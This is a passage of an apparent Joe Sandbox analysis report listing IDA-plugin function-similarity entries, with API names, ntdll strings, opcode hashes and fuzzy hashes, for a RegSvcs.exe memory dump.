                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 3446177414-3154609507
                                                                        • Opcode ID: a503f4feeda4f663a59543d00111d4efe1a94e14d81e111d57516d5d3b805de1
                                                                        • Instruction ID: a7e9643994b699b211b00d367b4f4a4e838b3e0acebd5f5047f3816bccf18cd0
                                                                        • Opcode Fuzzy Hash: a503f4feeda4f663a59543d00111d4efe1a94e14d81e111d57516d5d3b805de1
                                                                        • Instruction Fuzzy Hash: 5C41D432A187519FCB29CF9CD860A27BBE4EF69E50B06056DED88D7B55D730D800CB92
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                                        • API String ID: 3446177414-3526935505
                                                                        • Opcode ID: 96198f3bebbbbcfdae9162ef85578aae5150f0b372a49c0f8081f7de2738a40c
                                                                        • Instruction ID: f6ff391371705a97b4920fa316343cb4b90d96d4ffb93335d269431cf7502216
                                                                        • Opcode Fuzzy Hash: 96198f3bebbbbcfdae9162ef85578aae5150f0b372a49c0f8081f7de2738a40c
                                                                        • Instruction Fuzzy Hash: 8C318B35204B85DFDB2FDB6CD409B69BFE8EF02B14F054058E4428779AD7B5A881C752
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: $
                                                                        • API String ID: 3446177414-3993045852
                                                                        • Opcode ID: 59d6372379f3acbdffb38998c9b7646b2ee7e9fe7705424b6884a9ae94dab179
                                                                        • Instruction ID: 71d4ccdf9d06436f017e9383ba253effd12fb89689041ee41f5bab9ea6759cf6
                                                                        • Opcode Fuzzy Hash: 59d6372379f3acbdffb38998c9b7646b2ee7e9fe7705424b6884a9ae94dab179
                                                                        • Instruction Fuzzy Hash: 88112D32A04218EFCF19AFA4F848A9D7B72FF85764F108519F9266B2D0CB715A40CF80
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d577f9f5bbc3ca2d61b3364d2258a032be2b86bf200f7adac2a3c69bfbd8e289
                                                                        • Instruction ID: 49a45a68bcfd426636337b382a52cebb09a7f31c20a349fbc969adb5255cdf83
                                                                        • Opcode Fuzzy Hash: d577f9f5bbc3ca2d61b3364d2258a032be2b86bf200f7adac2a3c69bfbd8e289
                                                                        • Instruction Fuzzy Hash: 81E13475D00209DFCF29CFA9D990AADBBF9FF48304F20452AE956A7221D771A852CF11
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID:
                                                                        • API String ID: 3446177414-0
                                                                        • Opcode ID: b930b3675b58525b16074e9bb035d7f5f4c05c76671e0134f7941e9d1ebfad34
                                                                        • Instruction ID: 84ba1568198025dfbbd57d2ac2393beb0ad4e840aee9be1d77edae587cdf2622
                                                                        • Opcode Fuzzy Hash: b930b3675b58525b16074e9bb035d7f5f4c05c76671e0134f7941e9d1ebfad34
                                                                        • Instruction Fuzzy Hash: C1714771E0021AAFDF09CFA8C984ADDBBB5BF49314F14802AEA05FB254D774A906CF54
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID:
                                                                        • API String ID: 3446177414-0
                                                                        • Opcode ID: b1c1143d62effe0fbbaa596f70f1ccc06981fc44e96c31ccca3c2f63071cfd4c
                                                                        • Instruction ID: d119e26bd36cd30cab8d0f2916d025078e2de86d966e5f96279c537d4ddec12f
                                                                        • Opcode Fuzzy Hash: b1c1143d62effe0fbbaa596f70f1ccc06981fc44e96c31ccca3c2f63071cfd4c
                                                                        • Instruction Fuzzy Hash: 92514576E0521AEFDF08CF98D888ADCBBB1BF48314F14802AE905B7250D7749942CF54
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                        • String ID:
                                                                        • API String ID: 4281723722-0
                                                                        • Opcode ID: 2272a22d8479a09c0395e8a986cca7fbb6ecf17cf53b65587f57369de8f41d73
                                                                        • Instruction ID: c95aded831def864adc1123883d7fe5dd1e477d81c578850f13566641e70f467
                                                                        • Opcode Fuzzy Hash: 2272a22d8479a09c0395e8a986cca7fbb6ecf17cf53b65587f57369de8f41d73
                                                                        • Instruction Fuzzy Hash: 43310575E00219EFCF29DFA8E888AADBBF1FB49724F10812AE512B7294D7755900CF54
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: 2f2e1fe783827a9c66314534d8cae9ee5975c6e8998c47d6465a843bb586218f
                                                                        • Instruction ID: eb38286273faa53b45d277bfe8a5b84bac3b5c6513661b30e58bc104c9f556e8
                                                                        • Opcode Fuzzy Hash: 2f2e1fe783827a9c66314534d8cae9ee5975c6e8998c47d6465a843bb586218f
                                                                        • Instruction Fuzzy Hash: 81327970D0026ADFDB69DF68C884BEDBBB5BF09708F0081E9D549A7241D7749A84CF91
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: __aulldvrm
                                                                        • String ID: +$-
                                                                        • API String ID: 1302938615-2137968064
                                                                        • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                        • Instruction ID: 3ed77d1a1ce381180f291ae0c832fcef4bcb33fd3867a52c4e20fe6b6ce0aa6d
                                                                        • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                        • Instruction Fuzzy Hash: 42919471E002169AEB2CEF6DC8816BEBBA5AF44720F64C51AE965E72C0D73099418F52
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: Bl$l
                                                                        • API String ID: 3446177414-208461968
                                                                        • Opcode ID: a502c3e414e5d022dc92eadf72e36723c4728d5a3e64f9fcd0c9ac1c8de3797b
                                                                        • Instruction ID: 2efe56c586ed9438ea518c1ac390f1f77aa66c736f3d7ce5494fda193a946dc6
                                                                        • Opcode Fuzzy Hash: a502c3e414e5d022dc92eadf72e36723c4728d5a3e64f9fcd0c9ac1c8de3797b
                                                                        • Instruction Fuzzy Hash: 54A1E771A00329CBEFB9DB98D884BADBBB5BB44304F0540E9DD1967641CB74AE84CF51
                                                                        APIs
                                                                        • __startOneArgErrorHandling.LIBCMT ref: 01185E34
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorHandling__start
                                                                        • String ID: pow
                                                                        • API String ID: 3213639722-2276729525
                                                                        • Opcode ID: 71dca94e891258e79c414a2ccd91d9793f7b6ed9f3265be4d9237d995a4d647e
                                                                        • Instruction ID: efe823cad5b40da114bcf509d681ef618ddb638eafb62a057f512214868eaa05
                                                                        • Opcode Fuzzy Hash: 71dca94e891258e79c414a2ccd91d9793f7b6ed9f3265be4d9237d995a4d647e
                                                                        • Instruction Fuzzy Hash: C4518C7190C20696D7AEB61CD90537EBFE6EB40740F10C958E4E58A2D9EB3484D58F4F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$Flst
                                                                        • API String ID: 0-758220159
                                                                        • Opcode ID: 1efc9403a7d018d0689cfbf936ccfc657f6cc2115542015f4aee1afac05506f0
                                                                        • Instruction ID: b967849ee74171fb82eaf2c0ac6ec89a0882dd952b386950f5167261a7dc95ef
                                                                        • Opcode Fuzzy Hash: 1efc9403a7d018d0689cfbf936ccfc657f6cc2115542015f4aee1afac05506f0
                                                                        • Instruction Fuzzy Hash: 19519BB1E00218CFDF2ACF99D4846ADFBF4FF54758F25802AD0999B651EB709985CB80
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: $
                                                                        • API String ID: 3446177414-3993045852
                                                                        • Opcode ID: d080a817f98a9a5343235c850efd6399678a6c1174f680aba7dbf580d6a66a7f
                                                                        • Instruction ID: a1453afe3648e0c36eb3e002e89dc4cb86e038c9705c7cec249ac90253ecd842
                                                                        • Opcode Fuzzy Hash: d080a817f98a9a5343235c850efd6399678a6c1174f680aba7dbf580d6a66a7f
                                                                        • Instruction Fuzzy Hash: 7041AB75A0021AAFDF29DF99D884AEEBBB5FF48B04F150119ED00A7341C7719E52CBA0
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: 0$0
                                                                        • API String ID: 3446177414-203156872
                                                                        • Opcode ID: 57910884cc8f3f542d401e2c42643943943121a3a75c810dd7a245f8ff7e16ec
                                                                        • Instruction ID: 794107cc0ab19c90f139af2f7d706166b6e67cdbcc631509b5cf7f906cd1603c
                                                                        • Opcode Fuzzy Hash: 57910884cc8f3f542d401e2c42643943943121a3a75c810dd7a245f8ff7e16ec
                                                                        • Instruction Fuzzy Hash: B8417CB16087069FC714CF68D484A56BBE8BB88718F04492EF988DB341D771EA06CF96